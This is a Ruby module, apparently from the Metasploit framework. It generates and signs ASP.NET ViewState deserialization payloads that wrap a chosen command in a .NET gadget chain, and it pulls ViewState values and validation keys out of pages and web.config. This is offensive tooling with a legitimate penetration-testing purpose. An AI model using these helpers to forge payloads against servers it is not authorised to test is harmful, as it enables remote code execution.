lib/msf/core/exploit/view_state.rb
# -*- coding: binary -*-
#
# This is a specific implementation of ASP.NET ViewState generation and decoding
#
# Microsoft resources:
# https://docs.microsoft.com/en-us/archive/msdn-magazine/2010/july/security-briefs-view-state-security
# https://github.com/microsoft/referencesource/blob/master/System.Web/UI/LOSFormatter.cs
# https://github.com/microsoft/referencesource/blob/master/System.Web/UI/ObjectStateFormatter.cs
# https://github.com/microsoft/referencesource/blob/master/System.Web/UI/Page.cs
#
# Mono resources:
# https://github.com/mono/mono/blob/master/mcs/class/System.Web/System.Web.UI/LosFormatter.cs
# https://github.com/mono/mono/blob/master/mcs/class/System.Web/System.Web.UI/ObjectStateFormatter.cs
# https://github.com/mono/mono/blob/master/mcs/class/System.Web/System.Web.Util/MachineKeySectionUtils.cs
#
# Other resources:
# https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/
# https://github.com/pwntester/ysoserial.net/blob/master/ysoserial/Plugins/ViewStatePlugin.cs
#
# Kudos to zeroSteiner for Msf::Util::DotNetDeserialization and the inspiration
#
module Msf
module Exploit::ViewState
def initialize(info = {})
super
register_advanced_options([
OptEnum.new(
'DotNetGadgetChain',
[
true,
'.NET gadget chain to use in ViewState',
:TextFormattingRunProperties,
Msf::Util::DotNetDeserialization.formatter_compatible_gadget_chains(:LosFormatter)
]
)
])
end
def generate_viewstate_payload(cmd, extra: '', algo: 'sha1', key: '')
serialized_payload = Msf::Util::DotNetDeserialization.generate(
cmd,
gadget_chain: datastore['DotNetGadgetChain'].to_sym,
formatter: :LosFormatter
)
generate_viewstate(serialized_payload, extra: extra, algo: algo, key: key)
end
def generate_viewstate(data, extra: '', algo: 'sha1', key: '')
Rex::Exploit::ViewState.generate_viewstate(data, extra: extra, algo: algo, key: key)
end
def generate_viewstate_hmac(data, algo: 'sha1', key: '')
Rex::Exploit::ViewState.generate_viewstate_hmac(data, algo: algo, key: key)
end
def decode_viewstate(encoded_viewstate, algo: 'sha1')
decoded = Rex::Exploit::ViewState.decode_viewstate(encoded_viewstate, algo: algo)
vprint_error('Could not parse ViewState data') unless decoded[:data].present?
vprint_error('Could not parse ViewState HMAC') unless decoded[:hmac].present?
decoded
rescue Rex::Exploit::ViewState::Error => error
vprint_error("#{error.class.name}: #{error.message}")
return { data: nil, hmac: nil }
end
def can_sign_viewstate?(encoded_viewstate, extra: '', algo: 'sha1', key: '')
Rex::Exploit::ViewState.can_sign_viewstate?(encoded_viewstate, extra: extra, algo: algo, key: key)
rescue Rex::Exploit::ViewState::Error => error
vprint_error("#{error.class.name}: #{error.message}")
return false
end
# Extract __VIEWSTATE from HTML
def extract_viewstate(html)
html.at('//input[@id = "__VIEWSTATE"]/@value')&.text
end
# Extract __VIEWSTATEGENERATOR from HTML
def extract_viewstate_generator(html)
html.at('//input[@id = "__VIEWSTATEGENERATOR"]/@value')&.text
end
# Extract validationKey from web.config
def extract_viewstate_validation_key(web_config)
web_config.at('//machineKey/@validationKey')&.text
end
# Convenience method to convert __VIEWSTATEGENERATOR to binary
def pack_viewstate_generator(hex_generator)
[hex_generator.to_i(16)].pack('V')
end
# Convenience method to convert validationKey to binary
def pack_viewstate_validation_key(hex_key)
[hex_key].pack('H*')
end
end
end